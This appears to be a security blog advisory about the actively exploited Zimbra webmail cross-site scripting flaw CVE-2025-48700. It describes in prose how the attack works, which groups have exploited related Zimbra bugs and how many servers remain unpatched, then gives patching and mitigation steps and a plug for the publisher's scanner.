Zimbra XSS Flaw CVE-2025-48700 Hits 10K Servers

More than 10,500 Zimbra Collaboration Suite servers remain unpatched against an actively exploited cross-site scripting vulnerability tracked as CVE-2025-48700. CISA added the flaw to its Known Exploited Vulnerabilities catalog this week, and Shadowserver confirmed the exposed server count on Friday. The XSS vulnerability affects ZCS versions 8.8.15, 9.0, 10.0, and 10.1, and patches have been available since June 2025. Thousands of organizations running Zimbra simply have not applied them.

How CVE-2025-48700 Works

The attack surface is the Zimbra Classic UI webmail interface. An unauthenticated attacker sends a specially crafted email containing malicious HTML. When the recipient opens it inside a vulnerable Zimbra session, arbitrary JavaScript executes automatically inside their browser context. No user interaction beyond opening the email is required. No malicious attachments, no suspicious links, no macros.

Once the JavaScript runs in the victim's session, the attacker can access sensitive information tied to that session, including authentication tokens, email content, and contacts. The payload executes entirely inside the HTML body of a single message. Defenders scanning for suspicious attachments or links will miss this entirely.

Who Is Actively Exploiting This

CISA's KEV listing confirms real-world exploitation, though the agency has not published specific attacker attribution for CVE-2025-48700. The broader pattern here is worth understanding. A related Zimbra XSS flaw, CVE-2025-66376, was weaponized by APT28 (Fancy Bear) in phishing campaigns against Ukrainian government entities starting in January. Researchers at Seqrite Labs dubbed that operation GhostMail. APT29 (Cozy Bear) targeted vulnerable Zimbra servers at mass scale in late 2024. Russian cyberespionage group Winter Vivern exploited a similar reflected XSS bug in 2023 to steal emails from NATO-aligned organizations.

Zimbra's position as an email platform for government agencies and large enterprises makes it a consistent, high-value target for state-backed actors. The concentration of unpatched servers in Asia (3,794) and Europe (3,793) according to Shadowserver suggests this is not a niche exposure.

What Developers and Admins Are Actually Risking

If your organization runs Zimbra, the risk is not theoretical. A successful exploit gives an attacker JavaScript execution inside a logged-in user's browser session. From there they can exfiltrate session cookies, impersonate the user to internal systems, read and forward email silently, or pivot to further compromise depending on what other applications share that session context.

Government agencies operating under FCEB designation were ordered to patch by April 23. That deadline has passed. For everyone else, no mandatory deadline exists, but active exploitation means the window to act before an incident is closing fast.

How to Fix This Now

The steps are straightforward. Synacor released patches in June 2025. Apply them.

• Update ZCS to the latest patched release for your branch (8.8.15, 9.0, 10.0, or 10.1 all require updates).
• If you cannot patch immediately, restrict access to Zimbra Classic UI from untrusted networks at the perimeter level.
• Review webmail session logs for unexpected JavaScript execution or anomalous login activity following email opens.
• Consider Content Security Policy headers on the Zimbra web interface to limit what JavaScript can execute, even if a payload reaches the browser.
• Run an external scan against your Zimbra-facing endpoints to confirm patch status from an attacker's perspective.

You can run an automated check against your Zimbra instance at VibeWShield's scanner to identify exposed XSS vectors before attackers do. For broader context on XSS attack patterns, see our guide to reflected and stored XSS vulnerabilities.

How does CVE-2025-48700 differ from a typical phishing attack? Standard phishing relies on tricking users into clicking links or opening attachments. This exploit executes malicious JavaScript the moment the email is rendered in Zimbra's Classic UI. No interaction beyond opening the message is required, and no external resources are fetched that would trigger conventional security filters.

My Zimbra instance is behind a firewall. Am I still at risk? Partially. Network restrictions reduce exposure to external attackers, but internal threats or attackers who have already gained a foothold in your network can still deliver malicious emails through normal mail flow. Patching remains necessary regardless of perimeter controls.

How do I verify whether my Zimbra server is actually patched? Log into your ZCS admin console and check the build version against Synacor's June 2025 security advisory. Alternatively, use an external DAST scanner to probe the webmail interface for XSS indicators without requiring admin access.

Check if your Zimbra instance is exposed right now: Run a free scan at VibeWShield.